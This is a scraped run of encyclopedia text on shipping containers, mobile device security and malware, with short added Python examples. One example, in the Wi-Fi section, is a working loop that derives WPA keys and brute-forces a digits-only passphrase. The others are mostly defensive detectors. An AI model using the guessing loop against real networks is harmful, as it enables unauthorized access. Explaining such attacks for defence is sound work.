In the summer of 2010, a worldwide shortage of containers developed as shipping increased after the recession, while new container production had largely ceased.[101] Containers occasionally fall from ships, usually during storms. According to media sources, between 2,000[102]and 10,000 containers are lost at sea each year.[103]TheWorld Shipping Councilstates in a survey among freight companies that this claim is grossly excessive and calculated an average of 350 containers to be lost at sea each year, or 675 if including catastrophic events.[104]For instance, on November 30, 2006, a container washed ashore[105]on the Outer Banks ofNorth Carolina, along with thousands of bags of its cargo ofDoritos Chips. Containers lost in rough waters are smashed by cargo and waves, and often sink quickly.[102]Although not all containers sink, they seldom float very high out of the water, making them a shipping hazard that is difficult to detect. Freight from lost containers has providedoceanographerswith unexpected opportunities to track globalocean currents, notably a cargo ofFriendly Floatees.[106] In 2007 theInternational Chamber of Shippingand theWorld Shipping Councilbegan work on a code of practice for container storage, including crew training onparametric rolling, safer stacking, the marking of containers, and security for above-deck cargo in heavy swell.[107][108] In 2011, theMV Renaran aground off the coast of New Zealand. As the ship listed, some containers were lost, while others were held on board at a precarious angle. Some of the biggest battles in the container revolution were waged in Washington, D.C.. Intermodal shipping got a huge boost in the early 1970s, when carriers won permission to quote combined rail-ocean rates. Later, non-vessel-operatingcommon carrierswon a long court battle with a US Supreme Court decision against contracts that attempted to require that union labor be used for stuffing and stripping containers at off-pier locations.[109] Containers are ofteninfestedwithpests.[110][111]Pestintroductionsare significantly clustered around ports, and containers are a common source of such successful pest transfers.[110][111]The IPPCSea Container Task Force(SCTF) promulgates theCargo Transport Units Code(CTU), prescribedpesticidesand other standards (see§ Other container system standards) and recommendations for use in container decontamination, inspection and quarantine.[76]The SCTF also provides the English translation of the National Standard of China (GB/T 39919-2021).[76] Shipping container architectureis the use of containers as the basis for housing and other functional buildings for people, either as temporary or a permanent housing, and either as a main building or as a cabin or as a workshop. Containers can also be used as sheds or storage areas in industry and commerce. Tempo Housing in Amsterdam stacks containers for individual housing units. Containers are also beginning to be used to house computer data centers, although these are normally specialized containers. There is now a high demand for containers to be converted in the domestic market to serve specific purposes.[112]As a result, a number of container-specific accessories have become available for a variety of applications, such as racking for archiving, lining, heating, lighting, powerpoints to create purpose-built secure offices, canteens and drying rooms, condensation control for furniture storage, and ramps for storage of heavier objects. 
Containers are also converted to provide equipment enclosures, pop-up cafes, exhibition stands, security huts and more. Public containerised transport[113]is the concept, not yet implemented, of modifying motor vehicles to serve as personal containers in non-road passenger transport. The ACTS roller container standards have become the basis ofcontainerized firefighting equipmentthroughout Europe. Containers have also been used for weapon systems, such as the RussianClub-K, which allow the conversion of an ordinary container system into a missile boat, capable of attacking surface and ground targets, and the CWS (Containerized Weapon System)[114]developed for the US Army that allow for the rapid deployment of a remote controlled machine gun post from a container. On September 5, 2008, the BBC embarked on a year-long project to study international trade andglobalizationby tracking a shipping container on its journey around the world.[115][116]
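To close, a worked sketch of the container-capacity arithmetic described earlier in this article: TEU counts nominal length only (height is ignored), and the usable payload is the maximum gross mass minus the tare mass of the box. The tare figures below are typical values assumed for illustration, not ISO-mandated ones.

```python
# Worked sketch of the capacity arithmetic described above.
def teu(length_ft: float) -> float:
    """Twenty-foot equivalent units: nominal length only, height ignored."""
    return length_ft / 20.0

def max_payload_kg(max_gross_kg: float, tare_kg: float) -> float:
    """Usable payload is the rated gross mass minus the container's own (tare) mass."""
    return max_gross_kg - tare_kg

print(teu(40))                        # 2.0 -- a 40 ft box counts as two TEU
print(teu(20))                        # 1.0 -- high-cube and half-height 20 ft boxes still count as one TEU
print(max_payload_kg(24_000, 2_200))  # ~21,800 kg for an early-spec 20 ft container (typical tare assumed)
print(max_payload_kg(30_480, 3_800))  # ~26,700 kg for a 40 ft container (typical tare assumed)
```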
https://en.wikipedia.org/wiki/Containerization
Mobile security, ormobile device security, is the protection ofsmartphones, tablets, andlaptopsfrom threats associated withwireless computing.[1]It has become increasingly important inmobile computing. Thesecurityof personal and business information now stored onsmartphonesis of particular concern.[2] Increasingly, users and businesses use smartphones not only to communicate, but also to plan and organize their work and private life. Within companies, these technologies are causing profound changes in the organization ofinformation systemsand have therefore become the source of new risks. Indeed, smartphones collect and compile an increasing amount of sensitive information to which access must be controlled to protect theprivacyof theuserand theintellectual propertyof the company. The majority of attacks are aimed at smartphones.[citation needed]These attacks take advantage of vulnerabilities discovered in smartphones that can result from different modes of communication, includingShort Message Service(SMS, text messaging),Multimedia Messaging Service(MMS),wireless connections,Bluetooth, andGSM, the de facto international standard for mobile communications. Smartphone operating systems or browsers are another weakness. Somemalwaremakes use of the common user's limited knowledge. Only 2.1% of users reported having first-hand contact withmobile malware, according to a 2008 McAfee study, which found that 11.6% of users had heard of someone else being harmed by the problem. Yet, it is predicted that this number will rise.[3]As of December 2023, there were about 5.4 million global mobile cyberattacks per month. This is a 147% increase from the previous year.[4] Securitycountermeasuresare being developed and applied to smartphones, from security best practices in software to the dissemination of information to end users. Countermeasures can be implemented at all levels, includingoperating systemdevelopment, software design, and user behavior modifications. A smartphone user is exposed to various threats when they use their phone. In just the last two quarters of 2012, the number of unique mobile threats grew by 261%, according toABI Research.[3]These threats can disrupt the operation of the smartphone and transmit or modify user data. Applications must guarantee privacy and integrity of the information they handle. In addition, since some apps could themselves be malware, their functionality and activities should be limited (for example, restricting the apps from accessing location information via theGlobal Positioning System(GPS), blocking access to the user's address book, preventing the transmission of data on the network, or sending SMS messages that are billed to the user).[1]Malicious apps can also beinstalledwithout the owners' permission or knowledge. Vulnerabilityin mobile devices refers to aspects of system security that are susceptible to attacks. A vulnerability occurs when there is system weakness, an attacker has access to the weakness, and the attacker has competency to exploit the weakness.[1] Potential attackers began looking for vulnerabilities when Apple'siPhoneand the firstAndroiddevices came onto the market. Since the introduction of apps (particularly mobile banking apps), which are vital targets for hackers,malwarehas been rampant. 
The Department of Homeland Security's cybersecurity department claims that the number of vulnerable points in smartphone operating systems has increased. As mobile phones are connected to utilities and appliances, hackers, cybercriminals, and even intelligence officials have access to these devices.[5] Starting in 2011, it became increasingly popular to let employees use their own devices for work-related purposes. The Crowd Research Partners study, published in 2017, reports that during 2017 most businesses that mandated the use of mobile devices were subjected to malware attacks and breaches. It has become common for rogue applications to be installed on user devices without the user's permission; they breach privacy and hinder the effectiveness of the devices. Since the recent rise of mobile attacks, hackers have increasingly targeted smartphones through credential theft and snooping. The number of attacks targeting smartphones and other devices has risen by 50 percent, with mobile banking applications reportedly responsible for the increase. Malware—such as ransomware, worms, botnets, Trojans, and viruses—has been developed to exploit vulnerabilities in mobile devices. Malware is distributed by attackers so that they can gain access to private information or digitally harm a user. For example, should malware breach a user's banking service, it may be able to access their transaction information, their login credentials, and their money. Some malware is developed with anti-detection techniques to avoid detection, for example by hiding malicious code. Trojan-droppers can also evade detection: although the malware inside a device does not change, the dropper generates new hashes each time, and droppers can also create a multitude of files, which can lead to the creation of further viruses. Android mobile devices are prone to Trojan-droppers. Banking Trojans also enable attacks on the banking applications on the phone, leading to the theft of data and, ultimately, money. Jailbreaks for iOS devices work by disabling the enforcement of code signing on iPhones so that applications not downloaded from the App Store can be run. In this way, all the protection layers offered by iOS are disrupted, exposing the device to malware. These outside applications don't run in a sandbox, which exposes potential security problems. Some attack vectors change the mobile devices' configuration settings by installing malicious credentials and virtual private networks (VPNs) to direct information to malicious systems. In addition, spyware can be installed on mobile devices in order to track an individual. Triada malware comes pre-installed on some mobile devices. In addition to Haddad, there is Lotoor, which exploits vulnerabilities in the system to repackage legitimate applications.[6] The devices are also vulnerable to spyware and leaky behavior through applications. Mobile devices are also effective conveyance systems for malware threats, breaches of information, and thefts. Attacks through potentially insecure Wi-Fi networks are another risk: by compromising the network, hackers are able to gain access to key data, and devices connected to public networks are particularly exposed. A VPN, on the other hand, can be used to secure such connections, protecting traffic as soon as it is active.
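To see why the hash-churning behaviour of Trojan-droppers described above defeats naive blocklisting, consider this small illustration (the payload bytes are invented): the unchanged malicious body plus a few random padding bytes yields a completely different file hash on every build.

```python
# Why per-file hash blocklists fail against droppers: the same payload, padded
# with a few throwaway random bytes, hashes differently every time.
import hashlib
import os

payload = b"IDENTICAL-MALICIOUS-LOGIC"     # stand-in for the unchanged malware body

for build in range(3):
    packaged = payload + os.urandom(8)     # dropper adds random padding per build
    print(build, hashlib.sha256(packaged).hexdigest())
```

This is why signature databases track many digests per family, or match structural features rather than whole-file hashes.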
There are also social engineering techniques, such as phishing, in which unsuspecting victims are sent links to lead them to malicious websites. The attackers can then hack into the victim's device and copy all of its information. Some mobile device attacks can be prevented. For example, containerization allows the creation of a hardware infrastructure that separates business data from other data. Additionally, network protection detects malicious traffic and rogue access points. Data security is also ensured through authentication.[1] There are a number of threats to mobile devices, including annoyance, stealing money, invading privacy, propagation, and malicious tools.[7] There are three prime targets for attackers:[8] Attacks on mobile security systems include: The sources of these attacks are the same actors found in the non-mobile computing space:[8] When a smartphone is infected by an attacker, the attacker can attempt several things: Some attacks derive from flaws in the management of Short Message Service (SMS) and Multimedia Messaging Service (MMS). Some mobile phone models have problems in managing binary SMS messages. By sending an ill-formed block, it is possible to cause the phone to restart, leading to denial-of-service attacks. If a user with a Siemens S55 received a text message containing a Chinese character, it would lead to a denial of service.[18] In another case, while the standard requires that the maximum size of a Nokia Mail address is 32 characters, some Nokia phones did not verify this standard, so if a user entered an email address over 32 characters, the e-mail handler failed completely and was put out of commission. This attack is called "curse of silence". A study on the safety of the SMS infrastructure revealed that SMS messages sent from the Internet can be used to perform a distributed denial-of-service (DDoS) attack against the mobile telecommunications infrastructure of a big city. The attack exploits the delays in the delivery of messages to overload the network. Another potential attack could begin with a phone that sends an MMS to other phones, with an attachment infected with a virus. Upon receipt of the MMS, the user can choose to open the attachment. If it is opened, the phone is infected, and the virus sends an MMS with an infected attachment to all the contacts in the address book. There is a real-world example of this attack: the virus Commwarrior[17] sends MMS messages (including an infected file) to all recipients in a mobile phone's address book. If a recipient installs the infected file, the virus repeats, sending messages to recipients taken from the new address book. The attacker may try to break the encryption of a GSM mobile network. The network encryption algorithms belong to the family of algorithms called A5. Due to the policy of security through obscurity, it has not been possible to openly test the robustness of these algorithms. There were originally two variants of the algorithm: A5/1 and A5/2 (stream ciphers), where the former was designed to be relatively strong and the latter was purposely designed to be weak to allow easy cryptanalysis and eavesdropping. ETSI forced some countries (typically outside Europe) to use A5/2.
Since the encryption algorithm was made public, it was proved to be breakable: A5/2 could be broken on the fly, and A5/1 in about 6 hours.[19] In July 2007, the 3GPP approved a change request to prohibit the implementation of A5/2 in any new mobile phones, decommissioning the algorithm; it is no longer implemented in mobile phones. Stronger public algorithms have been added to the GSM standard: A5/3 and A5/4 (block ciphers), otherwise known as KASUMI or UEA1,[20] published by ETSI. If the network does not support A5/1, or any other A5 algorithm implemented by the phone, then the base station can specify A5/0, the null algorithm, whereby the radio traffic is sent unencrypted. Even if mobile phones are able to use 3G or 4G (which have much stronger encryption than 2G GSM), the base station can downgrade the radio communication to 2G GSM and specify A5/0 (no encryption).[21] This is the basis for eavesdropping attacks on mobile radio networks using a fake base station, commonly called an IMSI catcher. In addition, tracing of mobile terminals is difficult since each time the mobile terminal is accessing or being accessed by the network, a new temporary identity (TMSI) is allocated to it. The TMSI is used as the identity of the mobile terminal the next time it accesses the network, and it is sent to the mobile terminal in encrypted messages. Once the encryption algorithm of GSM is broken, the attacker can intercept all unencrypted communications made by the victim's smartphone. An attacker can also try to eavesdrop on Wi-Fi communications to derive information (e.g., username, password). This type of attack is not unique to smartphones, but they are very vulnerable to it because Wi-Fi is often their only means of communicating and accessing the Internet. The security of wireless networks (WLAN) is thus an important subject. Initially, wireless networks were secured by WEP keys. The weakness of WEP is its short encryption key, which is the same for all connected clients. In addition, several reductions in the search space of the keys have been found by researchers. Now, most wireless networks are protected by the WPA security protocol. WPA is based on the Temporal Key Integrity Protocol (TKIP), which was designed to allow migration from WEP to WPA on equipment already deployed. The major improvement in security is the use of dynamic encryption keys. For small networks, WPA uses a "pre-shared key" based on a shared secret. Encryption can be vulnerable if the shared key is short. With limited opportunities for input (i.e., only the numeric keypad), mobile phone users might define short encryption keys that contain only numbers. This increases the likelihood that an attacker will succeed with a brute-force attack. The successor to WPA, called WPA2, is supposed to be safe enough to withstand such an attack. The ability to provide customers with free and fast Wi-Fi gives a business an edge over those that do not. Free Wi-Fi is usually provided by organizations such as airports, coffee shops, and restaurants for a number of reasons, including encouraging customers to spend more time and money on the premises and helping users stay productive.[1] Another reason is enhanced customer tracking: many restaurants and coffee shops compile data about their customers so they can target advertisements directly to their devices. It also lets customers know what services the facility provides.
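Returning to the weak pre-shared keys discussed above: WPA-Personal derives its 256-bit pairwise master key with PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, for 4096 iterations, so anyone who has captured a handshake can test candidate passphrases offline. The following is a minimal sketch; the SSID, the victim's passphrase, and the narrowed search band are invented, and a real attack would search the full digits-only space, which is routine work for dedicated cracking hardware.

```python
# Sketch: offline guessing of a digits-only WPA pre-shared key.
# PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
import hashlib

SSID = b"CoffeeShopWiFi"                      # illustrative network name

def pmk(passphrase: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), SSID, 4096, 32)

# Stand-in for the key material recovered from a captured WPA handshake.
target = pmk("73914682")                      # the victim chose eight digits

def crack(candidates):
    for candidate in candidates:
        if pmk(candidate) == target:
            return candidate
    return None

# The full digits-only space is only 10**8 candidates; here we search a small
# band so the demo finishes quickly in pure Python.
print(crack(str(n) for n in range(73_910_000, 73_920_000)))
```

The defence is a long passphrase drawn from a large character set, which makes the candidate space infeasible to enumerate offline.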
Generally, individuals filter business premises based on Internet connections as another reason to gain a competitive edge. Network security is the responsibility of the organizations, as unsecured Wi-Fi networks are prone to numerous risks. The man-in-the-middle attack entails the interception and modification of data between parties. Additionally, malware can be distributed via the free Wi-Fi network and hackers can exploit software vulnerabilities to smuggle malware onto connected devices. It is also possible to eavesdrop and sniff Wi-Fi signals using special software and devices, capturing login credentials and hijacking accounts.[10] As with GSM, if the attacker succeeds in breaking the identification key, both the phone and the entire network it is connected to become exposed to attacks. Many smartphones remember wireless LANs they have previously connected to, allowing users to not have to re-identify with each connection. However, an attacker could create a Wi-Fi access point twin with the same parameters and characteristics as a real network. By automatically connecting to the fraudulent network, a smartphone becomes susceptible to the attacker, who can intercept any unencrypted data.[22] Lasco is a worm that initially infects a remote device using theSIS file format,[23]a type of script file that can be executed by the system without user interaction. The smartphone thus believes the file to come from a trusted source and downloads it, infecting the machine.[23] Security issues related to Bluetooth on mobile devices have been studied and have shown numerous problems on different phones. One easy to exploitvulnerabilityis that unregistered services do not require authentication, and vulnerable applications have avirtual serial portused to control the phone. An attacker only needed to connect to the port to take full control of the device.[24] In another example, an attacker sends a file via Bluetooth to a phone within range with Bluetooth in discovery mode. If the recipient accepts, a virus is transmitted. An example of this is a worm called Cabir.[17]The worm searches for nearby phones with Bluetooth in discoverable mode and sends itself to the target device. The user must accept the incoming file and install the program, after which the worm infects the machine. Other attacks are based on flaws in the OS or applications on the phone. Themobile web browseris an emerging attack vector for mobile devices. Just as common Web browsers, mobile web browsers are extended from pure web navigation with widgets and plug-ins or are completely native mobile browsers. Jailbreakingthe iPhone with firmware 1.1.1 was based entirely on vulnerabilities on the web browser.[25]In this case, there was a vulnerability based on astack-based buffer overflowin a library used by the web browser (LibTIFF). A similar vulnerability in the web browser for Android was discovered in October 2008.[26]Like the iPhone vulnerability, it was due to an obsolete and vulnerablelibrary, but significantly differed in that Android's sandboxing architecture limited the effects of this vulnerability to the Web browser process. Smartphones are also victims of classic Webpiracysuch as phishing, malicious websites, and background-running software. The big difference is that smartphones do not yet have strongantivirus softwareavailable.[27][failed verification] The Internet offers numerous interactive features that ensure a higher engagement rate, capture more and relevant data, and increase brand loyalty. 
Blogs, forums, social networks, and wikis are some of the most common interactive websites. Due to the tremendous growth of the Internet, there has been a rapid rise in the number of security breaches experienced by individuals and businesses. Mobile browser users can balance usage and caution in several ways,[28] such as reviewing computer security regularly, using secure and secret passwords, and correcting, upgrading, and replacing the necessary features. Installation of antivirus and anti-spyware programs is the most effective way of protecting the computer, as they offer protection against malware, spyware, and viruses. Additionally, they use firewalls, which are typically installed between trusted networks or devices and the Internet; by filtering the traffic that crosses this boundary, a firewall can prevent external users from accessing the internal computer system.[29] Sometimes it is possible to overcome the security safeguards by modifying the operating system (OS) itself, such as through the manipulation of firmware and malicious signature certificates. These attacks are difficult. In 2004, vulnerabilities in virtual machines running on certain devices were revealed: it was possible to bypass the bytecode verifier and access the native underlying operating system.[3] The results of this research were not published in detail. The firmware security of Nokia's Symbian Platform Security Architecture (PSA) is based on a central configuration file called SWIPolicy. In 2008, it was possible to manipulate the Nokia firmware before it was installed: some downloadable versions of this file were human-readable, so it was possible to modify and change the image of the firmware.[30] This vulnerability was solved by an update from Nokia. In theory, smartphones have an advantage over hard drives since the OS files are in read-only memory (ROM) and cannot be changed by malware. However, in some systems it was possible to circumvent this: in the Symbian OS, it was possible to overwrite a file with a file of the same name,[30] and on the Windows OS, it was possible to change a pointer from a general configuration file to an editable file. When an application is installed, the signing of the application is verified by a series of certificates. One can create a valid signature without using a valid certificate and add it to the list.[31] In the Symbian OS, all certificates are in the directory c:\resource\swicertstore\dat. With the firmware changes explained above, it is very easy to insert a seemingly valid but malicious certificate. Android is the OS that has been attacked the most, because it has the largest user base. A cybersecurity company reported having blocked about 18 million attacks in 2016.[32] In 2015, researchers at the French government agency Agence nationale de la sécurité des systèmes d'information (ANSSI, lit. 'French National Agency for the Security of Information Systems') demonstrated the capability to remotely trigger the voice interface of certain smartphones by using "specific electromagnetic waveforms".[5] The exploit took advantage of the antenna properties of headphone wires while plugged into the audio-output jacks of the vulnerable smartphones and effectively spoofed audio input to inject commands via the audio interface.[5] Juice jacking is a physical or hardware vulnerability specific to mobile platforms.
Utilizing the dual purpose of the USB charge port, many devices have been susceptible to having data exfiltrated from, or malware installed onto, a mobile device via malicious charging kiosks set up in public places or hidden in normal charge adapters. Jailbreaking is also a physical access vulnerability, in which a mobile device user hacks into the device to unlock it, exploiting weaknesses in the operating system. Mobile device users take control of their own device by jailbreaking it, allowing them to customize the interface, install applications, change system settings that are not allowed on the devices, tweak OS processes, and run uncertified programs. This openness exposes the device to a variety of malicious attacks which can compromise private data.[6] In 2010, researchers from the University of Pennsylvania investigated the possibility of cracking a device's password through a smudge attack (literally imaging the finger smudges on the screen to discern the user's password).[28] The researchers were able to discern the device password up to 68% of the time under certain conditions.[28] Outsiders may also perform over-the-shoulder surveillance on victims, such as watching specific keystrokes or pattern gestures, to obtain the device password or passcode. As smartphones are a permanent point of access to the Internet (they are often turned on), they can be compromised with malware as easily as computers. Malware is a computer program that aims to harm the system on which it resides. Trojans, worms and viruses are all considered malware. A Trojan is a program on a device that allows external users to connect discreetly. A worm is a program that reproduces itself on multiple computers across a network. A virus is malicious software designed to spread to other computers by inserting itself into legitimate programs and running in parallel with them. Malware remains far less widespread and serious on smartphones than on computers. Nonetheless, recent studies show that malware on smartphones has rocketed in the last few years, posing a challenge to analysis and detection.[26] In 2017, mobile malware variants increased by 54%.[34] Various common apps installed by millions can intrude on privacy, even if they were installed from a trusted software distribution service like the Google Play Store. For example, in 2022 it was shown that the popular app TikTok collects a lot of data and is required to make it available to the Chinese Communist Party (CCP) due to a national security law. This includes personal information on millions of Americans. The firmware and "stock software" preinstalled on devices – and updated with preinstalled software – can also have undesired components, privacy-intruding default configurations, or substantial security vulnerabilities. In 2019, Kryptowire identified Android devices with malicious firmware that collected and transmitted sensitive data without users' consent. Analysis of data traffic by popular smartphones running variants of Android found substantial by-default data collection and sharing, with no opt-out, by pre-installed software.[35][36] This issue also cannot be addressed by conventional security patches.
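One practical way to see what preinstalled software sends off the device is to review its outgoing connections. The sketch below assumes a hypothetical CSV export of per-app connection logs (app, destination host, bytes sent) and an invented allow-list; it only illustrates the review step, not the log format of any particular firewall or analysis tool.

```python
# Sketch: flag apps whose outgoing traffic goes to hosts outside a small
# allow-list. The CSV format and the allow-list are hypothetical.
import csv
import io
from collections import defaultdict

EXPECTED = {
    "weather":  {"api.weather.example"},
    "keyboard": set(),                     # a keyboard app should not phone home at all
}

log = io.StringIO(
    "app,host,bytes_sent\n"
    "weather,api.weather.example,1200\n"
    "keyboard,telemetry.vendor.example,45121\n"
)

unexpected = defaultdict(int)
for row in csv.DictReader(log):
    if row["host"] not in EXPECTED.get(row["app"], set()):
        unexpected[(row["app"], row["host"])] += int(row["bytes_sent"])

for (app, host), sent in unexpected.items():
    print(f"review: {app} sent {sent} bytes to unexpected host {host}")
```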
Outgoing Internet traffic can be analyzed with packet analyzers and with firewall apps such as NetGuard for Android, which allows blocked-traffic logs to be read.[37] Typically, an attack on a smartphone made by malware takes place in three phases: the infection of a host, the accomplishment of its goal, and the spread of the malware to other systems. Malware often uses the resources offered by infected smartphones. It will use output devices such as Bluetooth or infrared, but it may also use the address book or email address of the person to infect the user's acquaintances. The malware exploits the trust that is given to data sent by an acquaintance. Infection is the method used by malware to gain access to the smartphone; it may exploit an internal vulnerability or rely on the gullibility of the user. Infections are classified into four classes according to their degree of user interaction.[38] Once the malware has infected a phone, it will seek to accomplish its goal, which is usually one of the following:[39] Once the malware has infected a smartphone, it aims to spread to a new host.[40] This usually occurs to proximate devices via Wi-Fi, Bluetooth, or infrared, or to remote networks via telephone calls, SMS, or emails. Mobile ransomware is a type of malware that locks users out of their mobile devices in a pay-to-unlock-your-device ploy. It has grown significantly as a threat category since 2014.[43] Mobile users are often less security-conscious – particularly as it pertains to scrutinizing applications and web links – and trust the mobile device's native protection capability. Mobile ransomware poses a significant threat to businesses reliant on instant access and availability of their proprietary information and contacts. The likelihood of a traveling businessperson paying a ransom to unlock their device is significantly higher, since they are at a disadvantage given inconveniences such as timeliness and less direct access to IT staff. Recent ransomware attacks have caused many Internet-connected devices to stop working and are costly for companies to recover from. Attackers can also make their malware target multiple platforms. Some malware attacks a particular operating system but is able to spread across different systems. To begin with, such malware can use runtime environments like the Java virtual machine or the .NET Framework, and it can also use other libraries present in many operating systems.[45] Some malware carries several executable files in order to run in multiple environments, utilizing these during the propagation process. In practice, this type of malware requires a connection between the two operating systems to use as an attack vector. Memory cards can be used for this purpose, or synchronization software can be used to propagate the virus. Mobile security measures are divided into different categories, as they do not all act at the same level and are designed to prevent different threats. These methods range from the management of security by the operating system (protecting the system from corruption by an application) to the behavioral education of the user (preventing the installation of suspicious software). The first layer of security in a smartphone is the operating system.
Beyond needing to handle the usual roles (e.g., resource management, scheduling processes) on the device, it must also establish the protocols for introducing external applications and data without introducing risk. A central paradigm in mobile operating systems is the idea of a sandbox. Since smartphones are currently designed to accommodate many applications, they must have mechanisms to ensure these applications are safe for the phone itself, for other applications and data on the system, and for the user. If a malicious program reaches a mobile device, the vulnerable area presented by the system must be as small as possible. Sandboxing extends this idea to compartmentalize different processes, preventing them from interacting with and damaging each other. Based on the history of operating systems, sandboxing has different implementations. For example, where iOS focuses on limiting access to its public API for applications from the App Store by default, Managed Open In allows restricting which apps can access which types of data. Android bases its sandboxing on its legacy of Linux and TrustedBSD. The following points highlight mechanisms implemented in operating systems, especially Android. Above the operating-system security there is a layer of security software. This layer is composed of individual components addressing various vulnerabilities: preventing malware and intrusions, identifying a user as a human, and authenticating users. It contains software components that have learned from their experience with computer security; however, on smartphones, this software must deal with greater constraints (see limitations). Should a malicious application pass the security barriers, it can take the actions for which it was designed. However, such activity can sometimes be detected by monitoring the various resources used on the phone. Depending on the goals of the malware, the consequences of infection are not always the same; not all malicious applications are intended to harm the devices on which they are deployed.[62] The following resources are only indications and do not provide certainty about the legitimacy of the activity of an application. However, these criteria can help target suspicious applications, especially if several criteria are combined. Network traffic exchanged by phones can be monitored. One can place safeguards in network routing points in order to detect abnormal behavior. As a mobile device's use of network protocols is much more constrained than that of a computer, expected network data streams can be predicted (e.g., the protocol for sending an SMS), which permits detection of anomalies in mobile networks[64] (see the sketch below). In the production and distribution chain for mobile devices, manufacturers are responsible for ensuring that devices are delivered in a basic configuration without vulnerabilities. Most users are not experts, and many of them are not aware of the existence of security vulnerabilities, so the device configuration as provided by manufacturers will be retained by many users. Some smartphone manufacturers add a hardware security chip, such as the Titan M2, to increase mobile security.[65][66] The user bears a large share of responsibility in the cycle of security. This can be as simple as using a password, or as detailed as precisely controlling which permissions are granted to applications. This precaution is especially important if the user is an employee of a company who stores business data on the device. Much malicious behavior is allowed by user carelessness.
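Returning briefly to the traffic-monitoring approach mentioned above: because a handset's expected traffic is predictable, a sudden burst of SMS messages far above its usual rate is a reasonable trigger for review. A minimal sketch follows, with invented baseline counts and an invented four-sigma threshold.

```python
# Sketch of network-side anomaly detection: a handset that suddenly sends SMS
# messages far above its usual hourly rate is flagged for review.
from statistics import mean, stdev

def is_anomalous(history: list[int], latest: int, sigmas: float = 4.0) -> bool:
    """Flag the latest hourly SMS count if it is far above the device's baseline."""
    mu, sd = mean(history), stdev(history)
    # Floor the deviation so that a very flat baseline still requires a real jump.
    return latest > mu + sigmas * max(sd, 1.0)

baseline = [2, 0, 1, 3, 1, 2, 0, 1]          # messages per hour for a typical user
print(is_anomalous(baseline, 2))              # False -- normal behaviour
print(is_anomalous(baseline, 180))            # True  -- possible SMS malware
```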
Smartphone users were found to ignore security messages during application installation, especially during application selection and checking application reputation, reviews, security, and agreement messages.[73]A recent survey byinternet securityexperts BullGuard showed a lack of insight concerning the rising number of malicious threats affecting mobile phones, with 53% of users claiming that they are unaware of security software for smartphones. A further 21% argued that such protection was unnecessary, and 42% admitted it hadn't crossed their mind ("Using APA," 2011).[full citation needed]These statistics show that consumers are not concerned about security risks because they believe it is not a serious problem. However, in truth, smartphones are effectively handheld computers and are just as vulnerable. The following are precautions that a user can take to manage security on a smartphone: These precautions reduce the ability for people or malicious applications to exploit a user's smartphone. If users are careful, many attacks can be defeated, especially phishing and applications seeking only to obtain rights on a device. One form of mobile protection allows companies to control the delivery and storage of text messages, by hosting the messages on a company server, rather than on the sender or receiver's phone. When certain conditions are met, such as an expiration date, the messages are deleted.[80] The security mechanisms mentioned in this article are to a large extent inherited from knowledge and experience with computer security. The elements composing the two device types are similar, and there are common measures that can be used, such as antivirus software and firewalls. However, the implementation of these solutions is not necessarily possible (or is at least highly constrained) within a mobile device. The reason for this difference is the technical resources available to computers and mobile devices: even though the computing power of smartphones is becoming faster, they have other limitations: Furthermore, it is common that even if updates exist, or can be developed, they are not always deployed. For example, a user may not be aware of operating system updates; or a user may discover known vulnerabilities that are not corrected until the end of a long development cycle, which allows time to exploit the loopholes.[68] The following mobile environments are expected to make up future security frameworks:
https://en.wikipedia.org/wiki/Mobile_security
Malware (a portmanteau of malicious software)[1] is any software intentionally designed to cause disruption to a computer, server, client, or computer network, leak private information, gain unauthorized access to information or systems, deprive access to information, or interfere with the user's computer security and privacy without their knowledge.[1][2][3][4][5] Researchers tend to classify malware into one or more sub-types (i.e. computer viruses, worms, Trojan horses, logic bombs, ransomware, spyware, adware, rogue software, wipers and keyloggers).[1] Malware poses serious problems to individuals and businesses on the Internet.[6][7] According to Symantec's 2018 Internet Security Threat Report (ISTR), the number of malware variants rose to 669,947,865 in 2017, twice as many as in 2016.[8] Cybercrime, which includes malware attacks as well as other crimes committed by computer, was predicted to cost the world economy US$6 trillion in 2021, and is increasing at a rate of 15% per year.[9] Since 2021, malware has been designed to target computer systems that run critical infrastructure such as the electricity distribution network.[10] The defense strategies against malware differ according to the type of malware, but most can be thwarted by installing antivirus software and firewalls, applying regular patches, securing networks from intrusion, having regular backups and isolating infected systems. Malware can be designed to evade antivirus software detection algorithms.[8] The notion of a self-reproducing computer program can be traced back to initial theories about the operation of complex automata.[11] John von Neumann showed that in theory a program could reproduce itself; this constituted a plausibility result in computability theory. Fred Cohen experimented with computer viruses, confirmed von Neumann's postulate, and investigated other properties of malware such as detectability and self-obfuscation using rudimentary encryption. His 1987 doctoral dissertation was on the subject of computer viruses.[12] The use of cryptographic technology as part of the payload of a virus, exploiting it for attack purposes, was first investigated from the mid-1990s, and includes initial ransomware and evasion ideas.[13] Before Internet access became widespread, viruses spread on personal computers by infecting executable programs or boot sectors of floppy disks. By inserting a copy of itself into the machine code instructions in these programs or boot sectors, a virus causes itself to be run whenever the program is run or the disk is booted. Early computer viruses were written for the Apple II and Mac, but they became more widespread with the dominance of the IBM PC and MS-DOS. The first IBM PC virus in the wild was a boot sector virus dubbed (c)Brain, created in 1986 by the Farooq Alvi brothers in Pakistan.[14] Malware distributors would trick the user into booting or running from an infected device or medium. For example, a virus could make an infected computer add autorunnable code to any USB stick plugged into it. Anyone who then attached the stick to another computer set to autorun from USB would in turn become infected, and also pass on the infection in the same way.[15] Older email software would automatically open HTML email containing potentially malicious JavaScript code. Users may also execute disguised malicious email attachments.
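A small illustration of the disguised-attachment problem mentioned above: filenames with an executable extension, or a document extension followed by an executable one, deserve quarantine. The extension lists below are purely illustrative, and real mail filters inspect content, not just names.

```python
# Heuristic flagging of disguised executable email attachments (illustrative only).
import pathlib

EXECUTABLE = {".exe", ".scr", ".js", ".vbs", ".bat", ".jar"}
DECOY_DOCS = {".pdf", ".doc", ".docx", ".jpg"}

def suspicious(filename: str) -> bool:
    suffixes = [s.lower() for s in pathlib.PurePosixPath(filename).suffixes]
    runs_as_code = bool(suffixes) and suffixes[-1] in EXECUTABLE
    double_extension = len(suffixes) >= 2 and suffixes[-2] in DECOY_DOCS
    return runs_as_code or double_extension

for name in ["invoice.pdf", "invoice.pdf.exe", "holiday.jpg.js", "report.docx"]:
    print(f"{name:18} -> {'quarantine' if suspicious(name) else 'ok'}")
```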
